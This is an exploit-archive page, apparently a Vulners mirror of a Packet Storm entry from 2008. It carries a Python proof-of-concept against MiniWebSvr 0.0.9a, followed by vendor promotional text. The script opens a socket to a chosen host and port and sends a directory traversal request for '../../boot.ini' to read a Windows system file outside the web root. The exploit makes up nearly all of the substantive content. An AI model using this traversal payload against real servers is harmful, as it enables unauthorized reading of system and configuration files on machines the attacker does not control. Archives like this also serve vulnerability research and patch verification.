Lucene search
K

miniwebsvr-traverse.txt

🗓️ 04 Mar 2008 00:00:00Reported by gbrType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

MiniWebSvr 0.0.9a Directory Transversal Vulnerability exploi

Code
`import socket  
import sys  
  
print '---------------------------------------------------------'  
print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability'  
print 'Project URL: http://miniwebsvr.sourceforge.net/'  
print 'Author: gbr'  
print 'Tested on Windows XP SP2'  
print '---------------------------------------------------------'  
  
host = "127.0.0.1"  
port = 8080  
  
if sys.argv[1:]:  
host = sys.argv[1]  
if sys.argv[2:]:  
port = int(sys.argv[2])  
  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, port))  
s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n")  
while True:  
data = s.recv(4096)  
if not data:  
break  
print data  
  
except:  
print "Connection Error"  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Mar 2008 00:00Current
7.4High risk
Vulners AI Score7.4
16